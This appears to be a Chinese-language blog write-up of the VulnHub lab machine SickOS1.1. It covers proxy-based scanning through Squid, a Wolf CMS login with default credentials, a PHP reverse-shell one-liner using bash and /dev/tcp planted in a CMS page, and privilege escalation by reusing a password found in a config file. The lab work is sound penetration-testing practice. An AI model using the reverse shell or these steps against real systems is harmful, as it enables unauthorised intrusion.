首页 > 其他分享 >打靶:vulnhub中的SickOS1.1

打靶:vulnhub中的SickOS1.1

时间:2024-04-09 15:32:09浏览次数:24  
标签:http ip 端口 打靶 192.168 vulnhub SickOS1.1 靶机 33.138

靶机下载链接:https://download.vulnhub.com/sickos/sick0s1.1.7z

复现视频:【「红队笔记」靶机精讲:SickOS1.1 - 穿越Squid代理的CMS渗透】https://www.bilibili.com/video/BV1Em4y1A7XX?vd_source=09d322662ec63869ded6328cd2203029

解法一

靶机安装成功页面,靶机网络要设置成net模式。

信息收集

主机发现,可以用ip a看一下自己主机的ip地址,这样能方便的找到靶机ip

扫描端口

扫描端口对应的服务版本和操作系统,3128端口是个http的代理,8080端口被关闭了,但是后面也有个代理的关键词,可以尝试将3128端口设置为代理去访问8080端口。

利用kali自带的脚本去扫描漏洞

web渗透

访问3128端口,8080端口被关闭。

在百度之后发现squid3.1.19是作为代理服务器用的。

设置浏览器的代理,ip和对应端口

设置代理ip,port。

这时候再去访问8080端口,就可以访问成功了。

接下来就是常规的web渗透,扫描目录

由于80端口没有开放,8080端口也需要代理才能访问,所以扫描的脚本就没有运行起来。

设置dirb,利用代理端口3128去扫描靶机ip。这样就得到结果了,访问目录。

http://192.168.33.138/connect

得到的信息是

“我尝试非常频繁地连接事物”

“您可能想试试我的服务”

http://192.168.33.138/index;http://192.168.33.138/index.php;

得到的信息,是一个语气词。

http://192.168.33.138/robots;http://192.168.33.138/robots.txt;

得到一个目录

尝试去访问这个目录,进入一个cms。

利用必应去搜索wolfcms的后台路径,没想到直接就搜到了。

查看后台页面

登陆思路:尝试弱口令爆破;网上搜索cms的默认用户和密码;渗透去寻找其他的有用信息;

由于在网上已经找到了默认用户和密码,我们去尝试登陆一下。

成功登陆网站后台

在Articles文件中写入反弹shell命令

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/yourip/ports 0>&1'"); ?>

保存后,及时开启nc监听端口。

点击放大镜运行代码

收到一个shell

查看当前用户是谁,权限是多少。查看用户文件,谁拥有完整shell

但是是没权限看密码文件

提权

查看当前目录有哪些文件,发现一个配置文件

查看配置文件内容,发现一个用户名和密码

我们尝试用这一对用户名和密码去远程登陆

直接登陆root失败了

在前面还有一个用户“sickos”具有完整shell权限,尝试利用密码“john@123”登陆,成功了

查看当前用户,以及权限,提权成功。

成功拿到flag

 

标签:http,ip,端口,打靶,192.168,vulnhub,SickOS1.1,靶机,33.138
From: https://blog.csdn.net/qq_73865998/article/details/137549578

相关文章

  • Vulnhub靶机——EMPIRE: BREAKOUT
    靶机地址Empire:Breakout~VulnHub渗透关键点(1)tar文件具有可执行权,并且具备跨目录读取任意文件的特殊权限(2)backups(备份文件)中存在信息敏感文件渗透思路总结(1)信息收集(端口信息,源码泄露,服务扫描)(2)利用tar文件的特殊权限实现任意文件读取(3)su登录失败则执行反弹shell......
  • Vulnhub之dc-3
    信息收集ip扫描端口扫描80访问目录扫描发现目录administrator这里我用Wappalyzer对他做了指纹识别,发现这个网站是用Joomla这个框架搭建的,这时候我们就要从这个框架身上下手,去寻找框架的漏洞。用到一个Joomla框架的扫描工具--joomscan,kali安装apt-getinstalljo......
  • 17、Connect-the-dots(VulnHub)
    Connect-the-dots一、nmapcatports|grepopen|awk-F'/''{print$1}'|paste-sd','>nmap_open_port_total.txt二、ftp渗透没啥三、web渗透随便看看图片隐写目录爆破没错,web端给我们的提示就是去找备份/backupsbootstrap.min.cs这个是啥c......
  • Vulnhub之Kdc-4
     IP扫描端口扫描80bp爆破adminhappy对command页面进行了下测试,发现这里存在一个命令执行 bp反弹shellkali监听在home/jim发现密码备份文件保存字典爆破ssh登录发现charles用户密码sudo-lteehee提权-隐念笎-博客园(cnblogs.com)......
  • Linux提权——SUID&SUDO(Vulnhub靶机)
    #简述1、SUID提权SUID是Linux中的一中特殊权限,SUID可以让二进制程序的调用者以文件拥有者的身份运行该文件。如果对于一些特殊命令设置了SUID,那么就会有被提权的风险。而这个SUID提权的关键就是,找到root用户所拥有的SUID的文件&命令,运行该文件或者调用命令时,暂时拥有root权限,......
  • Vulnhub之Kdc-5
     一信息收集IP扫描 端口扫描 80  文件包含 目录扫描 访问 漏洞验证 系统是nginx,所以可以查看一下日志信息,nginx日志的默认日志路劲为/var/log/nginx/,一般nginx的日志都有access.log和error.log文件访问 bp拦截 蚁剑连接  反弹sh......
  • 红队笔记10:pWnOS2.0打靶流程-whatweb指纹识别-searchsploit搜索漏洞利用getshell(vulnh
    目录开头:1.主机发现和端口扫描2.80端口- whatweb指纹识别-searchsploit搜索漏洞并利用whatweb指纹识别:searchsploit搜索历史漏洞:什么是perl?SimplePHPblog登录成功-图片上传getshell3.提权-敏感文件泄露密码泄露尝试登录 4.总结:开头:学习的视频是哔哩哔哩红......
  • 权限提升-Linux系统权限提升篇&Vulnhub&Capability能力&LD_Preload加载&数据库等
    知识点1、Web或用户到Linux-数据库类型2、Web或用户到Linux-Capability能力3、普通用户到Linux-LD_Preload加载so配合sudo章节点:1、Web权限提升及转移2、系统权限提升及转移3、宿主权限提升及转移4、域控权限提升及转移基础点0、为什么我们要学习权限提升转移技......
  • 权限提升-Linux系统权限提升篇&Vulnhub&PATH变量&NFS服务&Cron任务&配合SUID
    知识点1、Web或普通用户到Linux-服务安全配合SUID-NFS2、普通用户到Linux-环境变量配合SUID-$PATH3、Web或普通用户到Linux-计划任务权限不当-Cron章节点:1、Web权限提升及转移2、系统权限提升及转移3、宿主权限提升及转移4、域控权限提升及转移基础点0、为什么我......
  • Vulnhub之KiraCTF
    一信息收集IP扫描端口扫描80访问upload上传上传要求是图片点击两次发现url多了en.php感觉是文件包含二提权生成木马上传木马msf监听文件包含shell成功交互式shell发现bassam用户密码切换用户,发现用户直接拥有sudo的权限,并且在用户更根目录下......